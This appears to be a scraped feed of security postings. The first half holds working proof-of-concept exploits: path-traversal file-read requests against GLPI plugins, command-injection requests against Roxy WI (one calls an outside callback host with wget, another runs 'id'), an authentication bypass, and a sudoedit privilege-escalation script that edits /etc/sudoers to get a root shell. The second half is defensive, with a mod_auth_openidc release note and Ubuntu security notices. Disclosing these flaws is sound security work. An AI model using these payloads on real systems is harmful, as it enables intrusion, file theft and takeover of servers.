GLPI Glpiinventory versions 1.0.1 and below suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion  # Date of found: 11 Jun 2022# Application: GLPI Glpiinventory <= 1.0.1# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi-inventory-plugin# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31062# PoCPOST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Glpiinventory 1.0.1 Local File Inclusion

GLPI Manageentities versions prior to 4.0.2 suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin# Date of found: 11 Jun 2022# Application: GLPI Manageentities < 4.0.2# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/manageentities# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34127# PoCGET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Manageentities Local File Inclusion

Roxy WI version 6.1.1.0 suffers from an unauthenticated remote code execution vulnerability.

    # ADVISORY INFORMATION# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.1.0# Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31161# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 123Origin: https://192.168.56.116Referer: https://192.168.56.116/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;

Roxy WI 6.1.1.0 Remote Code Execution

Roxy WI version 6.1.0.0 suffers from an unauthenticated remote code execution vulnerability.

    # ADVISORY INFORMATION# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.0.0# Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31126# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 73Origin: https://192.168.56.116Referer: https://192.168.56.116/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;

Roxy WI 6.1.0.0 Remote Code Execution

Roxy WI version 6.1.0.0 suffers from an improper authentication control vulnerability.

    # Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.0.0# Author: Nuri Çilengir# Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31125# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 105Origin: https://192.168.56.114Dnt: 1Referer: https://192.168.56.114/app/login.pySec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closealert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45

Roxy WI 6.1.0.0 Improper Authentication Control 

sudo versions 1.8.0 through 1.9.12p1 local privilege escalation exploit.

    #!/usr/bin/env bash# Exploit Title: sudo 1.8.0 to 1.9.12p1 - Privilege Escalation# Exploit Author: n3m1.sys# CVE: CVE-2023-22809# Date: 2023/01/21# Vendor Homepage: https://www.sudo.ws/# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz# Version: 1.8.0 to 1.9.12p1# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9## Git repository: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc## Running this exploit on a vulnerable system allows a localiattacker to gain # a root shell on the machine.## The exploit checks if the current user has privileges to run sudoedit or # sudo -e on a file as root. If so it will open the sudoers file for the# attacker to add a line to gain privileges on all the files and get a root # shell.if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'then    echo "> Currently installed sudo version is not vulnerable"    exit 1fiEXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '$root$|$ALL$|$ALL : ALL$' | cut -d ')' -f 2-)if [ -z "$EXPLOITABLE" ]; then    echo "> It doesn't seem that this user can run sudoedit as root"    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2else    echo "> BINGO! User exploitable"    echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"    echo "$( whoami ) ALL=(ALL:ALL) ALL"    read -n 1 -s -r -p "Press any key to continue..."    EDITOR="vim -- /etc/sudoers" $EXPLOITABLE    sudo su root    exit 0fi

sudo 1.9.12p1 Privilege Escalation

mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.

1.  Releases
2.  v2.4.13.2

**Security**

*   CVE-2023-28625: prevent core dump when OIDCStripCookies is set and a crafted Cookie header is supplied  
    GHSA-f5xw-rvfr-24qr
*   fix code scanning alerts from 2 code scanning tools all over the place

**Features**

*   add support for Elliptic Curve signing/encryption keys in addtiion to RSA keys,  
    i.e. client keys configured in OIDCPrivateKeyFiles/OIDCPublicKeyFiles, published on OIDCClientJwksUri  
    and used in private_key_jwt authentication, encrypted id_token's, request objects/uri's,  
    but also statically configured provider keys in OIDCOAuthVerifyCertFiles and OIDCProviderVerifyCertFiles
*   record authorization errors in environment variable OIDC_AUTHZ_ERROR  
    so its value can be used in logs e.g. with HTTP 401 responses in the access log:  
        LogFormat "%h %l %u %t %U %401{OIDC_AUTHZ_ERROR}e %>s %b" combined  
    also log authorization errors with oidc_debug instead of oidc_info

**Bugfixes**

*   fix for omitting the kid# prefix in OIDCPublicKeyFiles/OIDCPrivateKeyFiles and other certificate configuration primitives when linked against OpenSSL <= 1.0.x
*   allow target_link_uri's without a path in 3rd-party-init SSO with a multi-provider setup
*   correct cookie path printout in error log when target_link_uri does not match OIDCCookiePath

**Commercial**

*   binary packages for various other platforms such as Microsoft Windows 64bit/32bit, Red Hat Enterprise Linux 6, Red Hat Enterprise Linux 7/8 on Power PC (ppc64, ppc64le), Oracle Linux 6/7, older Ubuntu and Debian distro's, Oracle HTTP Server 11.1/12.1/12.2, IBM HTTP Server 8/9, Solaris 11.4, IBM AIX 7.2 and Mac OS X are available under a commercial agreement via sales@openidc.com
*   support for Redis over TLS, Redis (TLS) Sentinel, and Redis (TLS) Cluster is available under a commercial license via sales@openidc.com

CVE-2023-28625: Release release 2.4.13.2 · OpenIDC/mod_auth_openidc

Ubuntu Security Notice 5991-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that a use-after-free vulnerability existed in the SGI GRU driver in the Linux kernel. A local attacker could possibly use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5991-1  
March 31, 2023

linux-gcp-4.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems

Details:

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that a use-after-free vulnerability existed in the SGI  
GRU driver in the Linux kernel. A local attacker could possibly use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2022-3424)

Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux  
kernel contained an out-of-bounds write vulnerability. A local attacker  
could use this to cause a denial of service (system crash).  
(CVE-2022-36280)

Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel did not  
properly perform reference counting in some situations, leading to a use-  
after-free vulnerability. A local attacker could use this to cause a denial  
of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-41218)

It was discovered that the network queuing discipline implementation in the  
Linux kernel contained a null pointer dereference in some situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2022-47929)

José Oliveira and Rodrigo Branco discovered that the prctl syscall  
implementation in the Linux kernel did not properly protect against  
indirect branch prediction attacks in some situations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2023-0045)

It was discovered that a use-after-free vulnerability existed in the  
Advanced Linux Sound Architecture (ALSA) subsystem. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-0266)

Kyle Zeng discovered that the IPv6 implementation in the Linux kernel  
contained a NULL pointer dereference vulnerability in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-0394)

Kyle Zeng discovered that the ATM VC queuing discipline implementation in  
the Linux kernel contained a type confusion vulnerability in some  
situations. An attacker could use this to cause a denial of service (system  
crash). (CVE-2023-23455)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Wei Chen discovered that the DVB USB AZ6027 driver in the Linux kernel  
contained a null pointer dereference when handling certain messages from  
user space. A local attacker could use this to cause a denial of service  
(system crash). (CVE-2023-28328)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-4.15.0-1147-gcp     4.15.0-1147.163  
   linux-image-gcp-lts-18.04       4.15.0.1147.161

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5991-1  
   CVE-2021-3669, CVE-2022-3424, CVE-2022-36280, CVE-2022-41218,  
   CVE-2022-47929, CVE-2023-0045, CVE-2023-0266, CVE-2023-0394,  
   CVE-2023-23455, CVE-2023-23559, CVE-2023-28328

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1147.163

Ubuntu Security Notice USN-5991-1

Ubuntu Security Notice 5990-1 - It was discovered that musl did not handle certain i386 math functions properly. An attacker could use this vulnerability to cause a denial of service or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, and Ubuntu 18.04 LTS. It was discovered that musl did not handle wide-character conversion properly. A remote attacker could use this vulnerability to cause resource consumption , denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-5990-1March 31, 2023musl vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 ESM- Ubuntu 18.04 ESM- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were fixed in musl.Software Description:- musl: standard C libraryDetails:It was discovered that musl did not handle certain i386 math functionsproperly. An attacker could use this vulnerability to cause a denial ofservice (crash) or possibly execute arbitrary code. This issue onlyaffected Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, and Ubuntu 18.04 LTS.(CVE-2019-14697)It was discovered that musl did not handle wide-character conversionproperly. A remote attacker could use this vulnerability to cause resourceconsumption (infinite loop), denial of service, or possibly executearbitrary code. This issue only affected Ubuntu 14.04 ESM, Ubuntu 16.04ESM, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS. (CVE-2020-28928)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 ESM:musl 1.1.24-1ubuntu0.1~esm1musl-dev 1.1.24-1ubuntu0.1~esm1Ubuntu 18.04 ESM:musl 1.1.19-1ubuntu0.1~esm1musl-dev 1.1.19-1ubuntu0.1~esm1Ubuntu 16.04 ESM:musl 1.1.9-1ubuntu0.1~esm3musl-dev 1.1.9-1ubuntu0.1~esm3Ubuntu 14.04 ESM:musl 0.9.15-1ubuntu0.1~esm2musl-dev 0.9.15-1ubuntu0.1~esm2In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-5990-1CVE-2019-14697, CVE-2020-28928

Ubuntu Security Notice USN-5990-1

Ubuntu Security Notice 5989-1 - Tao Lyu discovered that GlusterFS did not properly handle certain event notifications. An attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5989-1March 30, 2023glusterfs vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:GlusterFS could be made to crash if it received a speciallycrafted request.Software Description:- glusterfs: clustered file-systemDetails:Tao Lyu discovered that GlusterFS did not properly handle certainevent notifications. An attacker could possibly use this issue tocause a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   glusterfs-client                     3.7.6-1ubuntu1+esm2   glusterfs-common                3.7.6-1ubuntu1+esm2   glusterfs-server                    3.7.6-1ubuntu1+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5989-1   CVE-2023-26253

Tag

#ubuntu